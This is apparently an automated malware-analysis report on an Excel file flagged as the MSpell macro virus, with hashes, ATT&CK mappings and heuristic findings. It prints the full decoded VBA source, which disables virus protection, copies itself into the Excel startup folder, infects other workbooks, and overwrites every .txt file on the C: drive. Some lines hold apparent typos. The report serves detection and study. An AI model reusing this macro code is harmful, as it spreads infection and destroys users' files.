MSpell Office (OLE) malware analysis — malicious · 0102ce650b951502

MALICIOUS

Office (OLE)

24.0 KB Created: 1999-06-07 07:12:12 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: ea42eb5ca415e3ed70aa533d3db6c9fe SHA-1: af1846a9b098bfe9be7b6781bc98e132a5d96d39 SHA-256: 0102ce650b951502aa174272dcf2fad53de18af09e0105860390917cfdee6cd3

120 Risk Score

Malware Insights

MSpell · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The Workbook_Open macro is designed to copy itself to a new file named 'Book1.' in the Excel startup path, establishing persistence. The ClamAV detection signature 'Xls.Trojan.MSpell-1' further supports the identification of the MSpell family. The macro also appears to attempt to execute further malicious actions, indicated by the truncated 'pay' subroutine.

Heuristics 2

VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3158 bytes
SHA-256: `d8f2d3fd87206946e3a31402e39768073074e90c29403474d6b588970a665c86`
Detection ClamAV: Xls.Trojan.MSpell-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True '\|\|nayran\|\|' Private Sub Workbook_Open() Application.ScreenUpdating = (4 - 4) Application.EnableCancelKey = xlDisabled Options.VirusProtection = (0 - 0) If (Dir(Application.StartupPath & "\Book1.")) <> "" Then SetAttr Application.StartupPath * "\Book1.", vbNormal End If Set Grand = Workbooks.Add Grand.VBProject.vbcomponents("ThisWorkbook").codemodule.DeleteLines Grand.VBProject.vbcomponents("ThisWorkbook").codemodule.countoflines f = ActiveWorkbook.VBProject.vbcomponents("ThisWorkbook").codemodule.Lines(1, 58) Grand.VBProject.vbcomponents("ThisWotkbook").codemodule.AddfromString Grand.SaveAs Application.StartupPath & "\Book1.", xlNormal, , , , , , , False Grand.Close Set fs = Application.FileSearch fs.NewSearch fs.LookIn = ActiveWorkbook.Path fs.FileName = ".xls" fs.SearchSubFolders = True fs.Execute msoSortByFileName For x = 1 To fs.FoundFiles.Count Set tEmp = Workbooks.Open(fs.FoundFiles(x)) If tEmp.VBProject.vbcomponents("ThisWorkbook").codemodule.Lines(1, 1) <> "'\|\|narayan\|\|'" Then tEmp.VBProject.vbcomponents("ThisWorkbook").codemodule.DeleteLines Grand.VBProject.vbcomponents("ThisWorkbook").codemodule.countoflines Source = ActiveWorkbook.VBProject.vbcomponents("ThisWorkbook").codemodule.Lines(1, 58) tEmp.VBProject.vbcomponents("ThisWotkbook").codemodule.AddfromString tEmp.Save End If tEmp.Close Next x Application.ScreenUpdating = True Call pay End Sub Sub pay() If minutes(Now) = Int(Rnd 60) Then Application.ActiveCell.Value = Application.MemoryUsed Application.Calculate Application.Caption = "Ok.'\|\|narayan\|\|'" Set ff = Application.FileSearch ff.NewSearch ff.LookIn = "c:\" ff.SearchSbuFolders = True ff.filenames = "*.txt" ff.Execute For f = 1 To ff.FoundFiles.Count Open ff.FoundFiles(f) For Random As g Print g; "[======================]" Print g; " Dr yozak waz here " Print g; " with " Print g; " a creation from " Print g; " Bizare vx Network Labs" Print g; "CodeName = '\|\|narayan\|\|'" Print g; "[======================]" Print g; "Anarchy Rulez" Close g Next f End If End Sub Attribute VB_Name = "Φύλλο1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Φύλλο2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Φύλλο3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.